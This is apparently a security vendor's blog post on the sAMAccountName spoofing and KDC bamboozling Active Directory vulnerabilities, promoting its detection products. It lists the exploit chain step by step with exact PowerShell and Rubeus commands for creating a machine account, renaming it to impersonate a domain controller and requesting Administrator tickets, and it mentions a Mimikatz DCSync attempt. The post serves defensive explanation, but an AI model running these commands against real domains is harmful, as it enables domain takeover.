Preventing samaccountname spoofing and kdc bamboozing

The year 2021 has been challenging for users of Microsoft Active Directory. From late December 2020, we saw significant vulnerability disclosures like Zerologon or Print Nightmare that attackers could use to take over an entire domain. Two more vulnerability disclosures this month make things worse. The sAMAccountName spoofing and KDC bamboozling vulnerabilities have made an attacker’s life easy as they have publicly available exploit code. Microsoft releases security patches for these vulnerabilities, and we strongly urge everyone to deploy them at the earliest to protect themselves from domain compromise.

These Active Directory vulnerabilities clearly show that AD security is an unexplored area, and we will see many more in the coming years. For an attacker, compromising AD, the most used identity platform, gives them complete control over an enterprise and motivates them to discover newer vulnerabilities. To truly protect Active Directory, organizations need to employ a multipronged approach.

Hardening Active Directory — Discover exposures, misconfigurations, vulnerabilities, and excessive privileges in your Active Directory environment and remediate them at the earliest and reduce your Attack Surface.

Prevent Active Directory reconnaissance — Attackers compromise a domain-joined system and use the basic domain privileges that come with it to discover privileged AD objects to perform privilege escalation and lateral movement. Attackers can get significant information about an organization’s privilege accounts, delegated admin accounts (AD ACLs), critical servers and services they run (e.g., databases and others), service accounts. Concealing AD objects from unauthorized access prevents an attacker from performing privilege escalation and lateral movement.

Prevent Domain Compromise — Once attackers discover privileged accounts, they steal credentials like passwords, hashes, and Kerberos tickets or perform brute force attacks like password spray. Once an attacker compromises higher privileges or finds a vulnerability in AD, they would use several techniques like Golden Ticket attack, Silver Ticket attack, Domain Replication to take over the AD and compromise all systems it manages, including rapid deployment of ransomware.

Attivo’s Identity Detection and Response products (IDR) prevent AD reconnaissance, identity theft, attacks on Active Directory, and risky entitlements that create attack paths. The Attivo research team ran the exploit steps described in the article “CVE-2021–42287/CVE-2021–42278 Weaponization” in an environment with the Attivo IDR solutions deployed. As expected, the solutions prevented the attacks, per design.

In this exploit, the first step is to “Create a Machine account in the domain.” By default, AD allows any standard or regular users to join systems to the AD domain. The ADAssessor product, one of the Attivo IDR solutions, proactively detects when standard or regular users can add systems to the domain as a security exposure.

Below are the steps an attacker could follow to compromise a domain:

Step 1: Create a Machine account in the domain

Command: New-MachineAccount -MachineAccount TestSPN6 -Domain Acme-labs.local -DomainController acm-rt-dns-01.Acme-Labs.Local -Verbose

Attivo customers who use the ADAssessor solution and have restricted the privilege to join systems to the domain are safe from this exploit as the first step of the attack will fail.

If attackers cannot leverage Step 1 or want to avoid detection, they can use an existing computer object with “modify” permission, then proceed to Steps 2 and 3 for the next attack stage.

Most AD assessments Attivo performed found this exposure and helped customers remediate it.

Step 2: Clearing SPNs

In this step, attackers with the “modify” privilege would change an existing computer object.

Command: Set-DomainObject “CN=TestSPN6,CN=Computers,DC=acme-labs,DC=local” -clear ‘serviceprincipalname’ -Verbose

Step 3: Change Machine Account sAMAccountName

Command: Set-MachineAccountAttribute -MachineAccount TestSPN6 -value “acm-rt-dns-01” -Attribute samaccountname -Verbose

Yet again, the ADAssessor solution played an essential role in detecting misconfigured permissions on critical containers like “Computers.”

Customers who have taken proactive measures to remediate such misconfigured permissions will protect themselves from the vulnerabilities described in Steps 2 and 3, leaving the exploit unsuccessful.

If a customer is vulnerable in the previous steps, the attackers will proceed to the next steps. Steps 4 to 6 are crucial because the attackers will impersonate “Administrator,” enabling a complete privilege escalation.

Step 4: Request TGT

The attackers request a TGT for the domain controller machine account. The example below uses the application Rubeus.

Command: .\Rubeus.exe asktgt /user:IDC1 /password:Password1 /domain:internal.zeroday.lab /dc:idc1.internal.zeroday.lab /nowrap

Step 5: Change Machine Account sAMAccountName

The attackers modify the “sAMAccountName” value of the machine account created in Step 1

Command: Set-MachineAccountAttribute -MachineAccount TestSPN -Value “TestSPN” -Attribute samaccountname -Verbose

Step 6: Request S4U2self

The attackers try to get a TGT impersonating as “Administrator.”

Command: .\Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:idc1.internal.zeroday.lab /self /altservice:LDAP/IDC1.internal.zeroday.lab /ptt /ticket:[TGT]

The Attivo IDR solutions include the ADSecure solution and the Credential Protection function. These prevent attackers from stealing credentials like Kerberos Tickets and hashes, eventing them from succeeding and protecting customers.

The ADSecure solution blocks the attacker from using a stolen Kerberos Ticket and raises a Pass-The-Ticket attack event.

Credentials Protection feature prevented the attacker from reading the credentials from the LSASS memory, raising an event for Unauthorized Credential Access.

Finally, we can see the exploit using Mimikatz to perform a DCSync attack failing with the error “ERROR kull_m_rpc_drsr_getDCBind ; RPC Exception 0x00000005 (5)” on the compromised endpoint.

Conclusion

Considering the number of attacks on Active Directory by ransomware operators and the volume of disclosed vulnerabilities this year, there is an urgent need to secure Active Directory by investing in the right set of tools.

Attivo Identity Detection and Response Solutions

Attivo Networks has leveraged its deep experience in privilege escalation and lateral movement detection to become a significant player in the IDR space. The company has secured its leadership position based on its broad portfolio of IDR solutions in the last year.

Learn more about Attivo’s identity solutions here.